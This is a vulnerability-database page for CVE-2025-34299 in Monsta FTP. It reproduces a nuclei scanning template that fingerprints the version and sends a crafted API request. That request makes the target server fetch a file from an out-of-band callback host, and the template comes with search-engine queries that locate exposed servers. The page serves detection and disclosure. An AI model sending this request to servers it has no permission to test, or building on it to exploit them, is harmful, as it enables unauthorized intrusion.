Lucene search
K

Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution

🗓️ 06 Jul 2026 03:02:03Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 28 Views

Monsta FTP up to version 2.11 has unauthenticated file uploads enabling remote code execution.

Related
Refs
Code
ReporterTitlePublishedViews
Family
GithubExploit
Exploit for CVE-2025-34299
19 Nov 202500:39
githubexploit
GithubExploit
Exploit for Unrestricted Upload of File with Dangerous Type in Monstaftp Monsta_Ftp
11 Dec 202503:42
githubexploit
Circl
CVE-2025-34299
7 Nov 202510:26
circl
CNNVD
Monsta FTP 代码问题漏洞
7 Nov 202500:00
cnnvd
CVE
CVE-2025-34299
7 Nov 202513:51
cve
Cvelist
CVE-2025-34299 Monsta FTP <= 2.11 Unauthenticated Arbitrary File Upload
7 Nov 202513:51
cvelist
EUVD
EUVD-2025-38247
7 Nov 202513:51
euvd
HackRead
Monsta FTP Vulnerability Exposed Thousands of Servers to Full Takeover
10 Nov 202510:53
hackread
Metasploit
Monsta FTP downloadFile Remote Code Execution
27 Nov 202518:57
metasploit
NVD
CVE-2025-34299
7 Nov 202514:15
nvd
Rows per page
id: CVE-2025-34299

info:
  name: Monsta FTP <= 2.11.2 - Unauthenticated Remote Code Execution
  author: KrE80r
  severity: critical
  description: |
    Monsta FTP = 2.11 contains an unrestricted file upload vulnerability caused by lack of authentication on file uploads, letting unauthenticated attackers execute arbitrary code by uploading crafted files.
  impact: |
    Unauthenticated attackers can upload malicious files to execute arbitrary code, potentially compromising the server.
  remediation: |
    Update to the latest version beyond 2.11.
  reference:
    - https://labs.watchtowr.com/whats-that-coming-over-the-hill-monsta-ftp-remote-code-execution-cve-2025-34299/
    - https://github.com/advisories/GHSA-42m5-3r2p-wr92
    - https://nvd.nist.gov/vuln/detail/CVE-2025-34299
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2025-34299
    epss-score: 0.72667
    epss-percentile: 0.99376
    cwe-id: CWE-434
  metadata:
    verified: true
    max-request: 2
    vendor: monstaftp
    product: monsta_ftp
    shodan-query: http.title:"Monsta FTP"
    fofa-query: title="Monsta FTP"
  tags: cve,cve2025,monsta,ftp,rce,unauth,file-upload,intrusive,oast,oob,vkev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/mftp/"
      - "{{BaseURL}}/"

    stop-at-first-match: true

    host-redirects: true
    max-redirects: 2

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "MonstaFTP")'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        group: 1
        regex:
          - 'monsta-min-([0-9.]+)\.js'
        internal: true

  - raw:
      - |
        POST {{BaseURL}}/mftp/application/api/api.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        request={"connectionType":"ftp","configuration":{"host":"{{interactsh-url}}","username":"nuclei-oast","initialDirectory":"/","password":"test","port":21},"actionName":"downloadFile","context":{"remotePath":"/test.txt","localPath":"/tmp/nuclei-oast-test.txt"}}

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: dsl
        dsl:
          - 'compare_versions(version, "<= 2.11.2")'

    extractors:
      - type: kval
        kval:
          - version
# digest: 4a0a00473045022100da2620b984bce6ec863f05578ce53e8f9123f8d571d646cc38a0c629a42ed58902207ddae0f0ca840c511457c99ad00ab8f9006f18dae72a6fd8be7e3b41b3ed19d4:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.6High risk
Vulners AI Score7.6
CVSS 3.19.8
CVSS 49.3
EPSS0.72667
SSVC
28